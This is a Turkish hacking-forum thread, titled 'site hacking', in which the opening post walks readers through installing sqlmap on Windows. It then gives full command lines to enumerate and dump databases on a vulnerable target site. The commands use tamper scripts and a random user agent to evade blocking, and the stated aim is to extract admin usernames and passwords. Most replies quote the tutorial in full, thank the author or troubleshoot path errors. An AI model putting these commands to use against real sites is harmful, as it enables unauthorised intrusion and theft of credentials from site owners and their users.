CMD İle SQL Injection Hack [Windows] - Site Hackleme / OBT İs HerYerDe

OBT is HeRYerDe · 2 Ocak 2022

Dosyalar & Tool

+ Python 3.10.1 adlı setup ile Python kuruyoruz
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+ sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz

Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız

sqlmap'ı CMD ile çalıştırma ;

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;

Kod:

cd ../../

Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:

cd sqlmap

Database Çekimi ;

NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Veri Tabanı İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables

Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;

[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns

Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;

[Admin Ve Password Bilgilerini Çekeceğiz.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump

Beğenmeyi Unutmayın! İYİ FORUMLAR.

-Bilgilendirme Amaçlıdır-

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀᴅᴇ

Toryy · 2 Ocak 2022

Elinize sağlık

ByTurkX · 2 Ocak 2022

OBT is HeRYerDe' Alıntı:
Dosyalar & Tool

+ Python 3.10.1 adlı setup ile Python kuruyoruz
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+ sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz

Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız

sqlmap'ı CMD ile çalıştırma ;

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;

Kod:

cd ../../

Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:

cd sqlmap

Database Çekimi ;

NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Database İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables

Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;

[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns

Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;

[Admin Ve Password Bilgilerini Çekeceğiz.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump

Beğenmeyi Unutmayın! İYİ FORUMLAR.

-Bilgilendirme Amaçlıdır-

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀᴅᴇ

Çok teşekkür ederim ama arkadaşlarımıza linux kullanmayı tavsiye ederim eskisi gibi zahmetli değil artık çok kolay zaten terminale eliniz bir alışırsa çok hızlanırsınız.

'The Wolf · 2 Ocak 2022

Eline sağlık.

OBT is HeRYerDe · 2 Ocak 2022

Toryy' Alıntı:
Elinize sağlık

ByTurkX' Alıntı:
Çok teşekkür ederim ama arkadaşlarımıza linux kullanmayı tavsiye ederim eskisi gibi zahmetli değil artık çok kolay zaten terminale eliniz bir alışırsa çok hızlanırsınız.

'The Wolf' Alıntı:
Eline sağlık.

Teşekkürler.

ByTurkX' Alıntı:
Çok teşekkür ederim ama arkadaşlarımıza linux kullanmayı tavsiye ederim eskisi gibi zahmetli değil artık çok kolay zaten terminale eliniz bir alışırsa çok hızlanırsınız.

CMD'yi Tercih Edenler İçin Hazırlanmıştır.

awesofc · 2 Ocak 2022

çok işime yariyacak teşekur ederim

belirten dosya bulamiyor hatasi veriyor

1wexter1 · 2 Ocak 2022

awesofc' Alıntı:
belirten dosya bulamiyor hatasi veriyor

"cd sqlmap" yazmadan önce "cd downloads" yap

ondan sonra "cd sqlmap" yap olur.

CasPeRAB · 2 Ocak 2022

OBT is HeRYerDe' Alıntı:
Dosyalar & Tool

+ Python 3.10.1 adlı setup ile Python kuruyoruz
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+ sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz

Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız

sqlmap'ı CMD ile çalıştırma ;

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;

Kod:

cd ../../

Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:

cd sqlmap

Database Çekimi ;

NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Veri Tabanı İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables

Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;

[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns

Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;

[Admin Ve Password Bilgilerini Çekeceğiz.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump

Beğenmeyi Unutmayın! İYİ FORUMLAR.

-Bilgilendirme Amaçlıdır-

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀᴅᴇ

Vayyy güzel ve net olmuş elleriniz sağlık

OBT is HeRYerDe · 2 Ocak 2022

awesofc' Alıntı:
belirten dosya bulamiyor hatasi veriyor

sqlmap Dosyasını C:\ Dizinine Attınız Mı

CasPeRAB' Alıntı:
Vayyy güzel ve net olmuş elleriniz sağlık

Teşekkürler.

awesofc' Alıntı:
çok işime yariyacak teşekur ederim

Ne Demek.

awesofc' Alıntı:
belirten dosya bulamiyor hatasi veriyor

İsterseniz DM Gelin, Anlatayım.

Maveraün Nehr · 2 Ocak 2022

Bir site üzerinde deneyerek göstermenin daha yararlı olacağını düşünüyorum ama temel mantık olarak güzel bir anlatım olmuş.

ancients123 · 2 Ocak 2022

Ellerine sağlık kali kullanmayanlar için güzel bir konu

Taferel · 2 Ocak 2022

elinize sağlık güzel anlatmışsınız

OBT is HeRYerDe · 3 Ocak 2022

Maveraun.Nehr' Alıntı:
Bir site üzerinde deneyerek göstermenin daha yararlı olacağını düşünüyorum ama temel mantık olarak güzel bir anlatım olmuş.

Yakında O Da Gelecek Hocam, Teşekkürler.

ancients123' Alıntı:
Ellerine sağlık kali kullanmayanlar için güzel bir konu

Sağolun Hocam.

Taferel' Alıntı:
elinize sağlık güzel anlatmışsınız

Sağol Dostum.

egemizah · 3 Ocak 2022

OBT is HeRYerDe' Alıntı:
Dosyalar & Tool

+ Python 3.10.1 adlı setup ile Python kuruyoruz
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+ sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz

Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız

sqlmap'ı CMD ile çalıştırma ;

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;

Kod:

cd ../../

Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:

cd sqlmap

Database Çekimi ;

NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Veri Tabanı İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables

Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;

[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns

Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;

[Admin Ve Password Bilgilerini Çekeceğiz.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump

Beğenmeyi Unutmayın! İYİ FORUMLAR.

-Bilgilendirme Amaçlıdır-

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀᴅᴇ

elinize sağlık

OBT is HeRYerDe · 3 Ocak 2022

egemizah' Alıntı:
elinize sağlık

Teşekkürler.

Maveraün Nehr · 3 Ocak 2022

OBT is HeRYerDe' Alıntı:
Yakında O Da Gelecek Hocam, Teşekkürler.

Teşekkürler bekliyoruz o halde

Mertoktay5 · 3 Ocak 2022

OBT is HeRYerDe' Alıntı:
Dosyalar & Tool

+ Python 3.10.1 adlı setup ile Python kuruyoruz
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+ sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz

Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız

sqlmap'ı CMD ile çalıştırma ;

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;

Kod:

cd ../../

Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:

cd sqlmap

Database Çekimi ;

NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Veri Tabanı İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables

Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;

[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns

Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;

[Admin Ve Password Bilgilerini Çekeceğiz.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump

Beğenmeyi Unutmayın! İYİ FORUMLAR.

-Bilgilendirme Amaçlıdır-

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀᴅᴇ

Adanalıtrojan · 6 Ocak 2022

OBT is HeRYerDe' Alıntı:
Dosyalar & Tool

+ Python 3.10.1 adlı setup ile Python kuruyoruz
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+ sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz

Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız

sqlmap'ı CMD ile çalıştırma ;

Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;

Kod:

cd ../../

Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;

Kod:

cd sqlmap

Database Çekimi ;

NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Veri Tabanı İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables

Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;

[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns

Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;

[Admin Ve Password Bilgilerini Çekeceğiz.]

Kod:

python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump

Beğenmeyi Unutmayın! İYİ FORUMLAR.

-Bilgilendirme Amaçlıdır-

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀᴅᴇ

Dostum eline sağlıkta artık sqlmap eskidi , daha iyi açıkları anlatsan port , dom ,xss sömürülmesi en zor olan açık?

1wexter1 · 7 Ocak 2022

Öncellikle eline sağlık.

bende önceden sqlmap-master yüklüydü onu sildim senin
verdiğin dosyayı indirdim dediğin şeyleri yaptım
"cd ../../" bunu yaptım sonra "cd sqlmap" yaptım o da oldu ama sonra
"python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs " yazdım sonra şu hatayı verdi

"python: can't open file 'C:\\sqlmap\\sqlmap.py': [Errno 2] No such file or directory" nerede yalnış yaptım?

OBT is HeRYerDe · 7 Ocak 2022

1wexter1' Alıntı:
Öncellikle eline sağlık.

bende önceden sqlmap-master yüklüydü onu sildim senin
verdiğin dosyayı indirdim dediğin şeyleri yaptım
"cd ../../" bunu yaptım sonra "cd sqlmap" yaptım o da oldu ama sonra
"python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs " yazdım sonra şu hatayı verdi

"python: can't open file 'C:\\sqlmap\\sqlmap.py': [Errno 2] No such file or directory" nerede yalnış yaptım?

DM'den Ekran Görüntüsü Atabilir Misin Dostum? Daha Detaylı Görmek İstiyorum.

CMD İle SQL Injection Hack [Windows] - Site Hackleme / OBT İs HerYerDe

Anka Team

Kıdemli Üye

Üye

Kıdemli Üye

Anka Team

Katılımcı Üye

Katılımcı Üye

Uzman üye

Anka Team

Blue Expert / Head of Malware Team

Uzman üye

Yeni üye

Anka Team

Katılımcı Üye

Anka Team

Blue Expert / Head of Malware Team

Üye

Kıdemli Üye

Katılımcı Üye

Anka Team